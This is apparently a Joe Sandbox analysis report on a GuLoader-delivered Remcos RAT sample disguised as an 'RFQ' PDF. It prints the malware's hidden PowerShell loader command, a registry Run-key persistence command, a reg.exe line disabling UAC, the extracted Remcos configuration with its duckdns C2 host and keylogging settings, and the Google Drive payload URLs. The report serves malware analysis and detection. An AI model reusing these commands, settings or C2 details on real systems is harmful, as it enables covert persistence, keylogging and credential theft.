Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ24060084#U00b7pdf.exe

Overview

General Information

Sample name:RFQ24060084#U00b7pdf.exe
renamed because original name is a hash value
Original sample name:RFQ24060084pdf.exe
Analysis ID:1472083
MD5:4d5aa2285d7426050f478210bae7c5aa
SHA1:54d7e8ce63dd56acc9dab89d0fe9bdeba0acda96
SHA256:9f200b4426729f0d0f0b5977709c26f9961594f6612468102cec4dde53afc124
Tags:exe
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disables UAC (registry)
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • RFQ24060084#U00b7pdf.exe (PID: 8072 cmdline: "C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe" MD5: 4D5AA2285D7426050F478210BAE7C5AA)
    • powershell.exe (PID: 8144 cmdline: "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Fatherhoods.exe (PID: 8112 cmdline: "C:\Users\user\AppData\Local\Temp\Fatherhoods.exe" MD5: 4D5AA2285D7426050F478210BAE7C5AA)
        • cmd.exe (PID: 7232 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 2224 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • cmd.exe (PID: 2180 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 2788 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • Fatherhoods.exe (PID: 7376 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\yclmrmwzwbdunxrzdoz" MD5: 4D5AA2285D7426050F478210BAE7C5AA)
        • Fatherhoods.exe (PID: 7760 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\ieqxsfhtkjvzqdndurmsqf" MD5: 4D5AA2285D7426050F478210BAE7C5AA)
        • Fatherhoods.exe (PID: 2652 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\tydqtxsuyrnmajbpdcyttscnyt" MD5: 4D5AA2285D7426050F478210BAE7C5AA)
        • Fatherhoods.exe (PID: 5456 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\qqfaqoxzawjkoyuyo" MD5: 4D5AA2285D7426050F478210BAE7C5AA)
        • Fatherhoods.exe (PID: 5276 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\akkkrhibwebpzeqcfkuhx" MD5: 4D5AA2285D7426050F478210BAE7C5AA)
        • Fatherhoods.exe (PID: 5264 cmdline: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\lepdszsvkmtcbkegougjiype" MD5: 4D5AA2285D7426050F478210BAE7C5AA)
  • svchost.exe (PID: 5076 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "}a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000002.00000002.2128913387.000000000BF76000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Fatherhoods.exe PID: 8112JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            Click to see the 3 entries

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2224, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Preoccupant
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7232, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", ProcessId: 2224, ProcessName: reg.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Fatherhoods.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe, ParentProcessId: 8112, ParentProcessName: Fatherhoods.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)", ProcessId: 7232, ProcessName: cmd.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)", CommandLine: "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe", ParentImage: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe, ParentProcessId: 8072, ParentProcessName: RFQ24060084#U00b7pdf.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)", ProcessId: 8144, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5076, ProcessName: svchost.exe

            Stealing of Sensitive Information

            barindex
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe, ProcessId: 8112, TargetFilename: C:\ProgramData\remcos\logs.dat
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "}a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Source: a458386d9.duckdns.orgVirustotal: Detection: 12%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeReversingLabs: Detection: 40%
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeVirustotal: Detection: 54%Perma Link
            Source: RFQ24060084#U00b7pdf.exeReversingLabs: Detection: 40%
            Source: RFQ24060084#U00b7pdf.exeVirustotal: Detection: 54%Perma Link
            Source: Yara matchFile source: 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Fatherhoods.exe PID: 8112, type: MEMORYSTR
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeJoe Sandbox ML: detected
            Source: RFQ24060084#U00b7pdf.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,17_2_00404423
            Source: RFQ24060084#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.10:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.10:49712 version: TLS 1.2
            Source: RFQ24060084#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2128067857.0000000008CE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2125069144.0000000007BED000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2116134547.00000000034D1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2116134547.00000000034D1000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_0040646B FindFirstFileA,FindClose,7_2_0040646B
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_004027A1 FindFirstFileA,7_2_004027A1
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,7_2_004058BF
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_22C210F1
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C26580 FindFirstFileExA,7_2_22C26580
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407EF8
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407898
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\kilns\Unobtainably\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\kilns\Jump to behavior

            Networking

            barindex
            Source: Malware configuration extractorURLs: }a458386d9.duckdns.org
            Source: unknownDNS query: name: a458386d9.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.10:49713 -> 217.76.50.73:3256
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 217.76.50.73 217.76.50.73
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSE SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Fatherhoods.exe, 00000011.00000003.2229531439.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000003.2256602148.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: Fatherhoods.exe, 00000011.00000003.2229531439.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000003.2256602148.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: Fatherhoods.exe, 00000007.00000002.2602557067.0000000022BF0000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000013.00000002.2165469830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: Fatherhoods.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: Fatherhoods.exe, 00000011.00000002.2234766300.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257531283.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: Fatherhoods.exe, 00000011.00000002.2234766300.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257531283.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: Fatherhoods.exe, 00000007.00000002.2601725533.0000000022840000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: Fatherhoods.exe, 00000007.00000002.2601725533.0000000022840000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: a458386d9.duckdns.org
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: svchost.exe, 00000010.00000002.2584436490.000001BFC1400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
